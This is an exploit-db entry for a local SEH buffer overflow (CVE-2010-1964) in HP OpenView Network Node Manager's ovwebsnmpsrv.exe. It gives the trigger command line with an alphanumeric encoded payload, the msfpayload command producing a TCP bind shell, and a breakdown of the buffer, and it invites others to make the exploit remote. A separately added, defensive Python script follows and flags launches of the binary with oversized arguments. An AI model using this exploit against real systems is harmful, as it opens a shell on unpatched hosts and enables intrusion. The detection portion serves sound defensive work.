HP OpenView Network Node Manager (OV NNM) 7.53 – ‘ovwebsnmpsrv.exe’ Local Buffer Overflow (SEH)

  • Author: bitform
    Date: 2010-07-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14256/
    # Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
    # Date: 07/06/2010
    # Author: bitform
    # Software Link: hp.com
    # Version: 7.53
    # Tested on: Windows XP SP2
    # CVE: CVE-2010-1964
    
    # Exploit:
    
    C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\[...],Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC
    
    # Notes: 
    
    This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting
    a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this
    a practical remote exploit. :D
    
    Overflowing many of the other command line options will overwrite SEH as well (e.g. -demo).
    
    Explanation of buffer:
    
    "UXf-9Tf-9Tf-9TU"
    Carve out EAX as the base register for the alphanumeric shellcode
    
    "PYIIIIIIIIIIIIIIII7QZ"...
    Alphanumeric bind shell
    # ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST=127.0.0.1 R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw
    
     \/ Overwrite SEH
    []
    "YY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP"
    [ ]
         /\ Carve out non-conditional jmp to carve EAX code
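The advisory above says the SEH overwrite is reached by overflowing command-line options of ovwebsnmpsrv.exe (-dump, -demo and others). From a detection standpoint, that makes the command line itself the observable: a legitimate invocation of this binary carries short option values, while the trigger needs hundreds of bytes in one argument. The following is an added example, not part of the original exploit-db entry or of HP's software, of a small process-creation log check that flags ovwebsnmpsrv.exe launches with an oversized argument. The `Image=...;CommandLine=...` record layout, the sample events and the 64-byte threshold are all assumptions constructed for this example; in practice the same logic would sit over Sysmon Event ID 1 or Windows 4688 fields and the threshold would be tuned to the longest legitimate argument seen in the environment.

```python
import ntpath

# Constructed sample of process-creation events (not real telemetry), using a
# simplified "key=value;key=value" layout assumed for this example.
SAMPLE_EVENTS = [
    r"Image=C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe;CommandLine=ovwebsnmpsrv.exe -dump " + "A" * 300,
    r"Image=C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe;CommandLine=ovwebsnmpsrv.exe -demo " + "B" * 150,
    r"Image=C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe;CommandLine=ovwebsnmpsrv.exe -dump node01",
    # Different binary with a long argument: out of scope for this rule, must not fire.
    r"Image=C:\Windows\System32\cmd.exe;CommandLine=cmd.exe /c echo " + "A" * 300,
]

TARGET_IMAGE = "ovwebsnmpsrv.exe"
MAX_ARG_LEN = 64  # assumed threshold; tune to the longest legitimate argument in your environment


def parse_event(line):
    """Split one 'key=value;key=value' record into a dict (assumed record layout)."""
    fields = {}
    for part in line.split(";"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return fields


def oversized_args(command_line, limit=MAX_ARG_LEN):
    """Return the arguments (excluding argv[0]) longer than `limit` characters.

    Splitting on whitespace is deliberate: Windows paths use backslashes, so
    POSIX-style shlex splitting would mangle them.
    """
    return [arg for arg in command_line.split()[1:] if len(arg) > limit]


def flag_events(lines, limit=MAX_ARG_LEN):
    """Flag ovwebsnmpsrv.exe launches whose command line carries an oversized argument."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        image = ntpath.basename(ev.get("Image", "")).lower()
        if image != TARGET_IMAGE:
            continue
        args = oversized_args(ev.get("CommandLine", ""), limit)
        if args:
            flagged.append({
                "image": image,
                "oversized_count": len(args),
                "max_arg_len": max(len(a) for a in args),
            })
    return flagged


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print("ALERT: %(image)s launched with %(oversized_count)d argument(s) over the limit "
              "(longest %(max_arg_len)d chars)" % hit)
```

The check is intentionally keyed on the image name plus argument length rather than on the byte pattern of this particular payload, since the author notes that other options besides -dump also reach the overwrite and the encoded shellcode differs per sample; the vendor fix for CVE-2010-1964 remains the actual remediation, this only surfaces attempts against unpatched hosts.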